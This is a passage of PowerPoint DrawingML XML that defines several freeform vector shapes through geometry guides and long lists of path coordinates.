                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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4122" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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4123" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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4124" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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4125" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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4126" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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4127" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
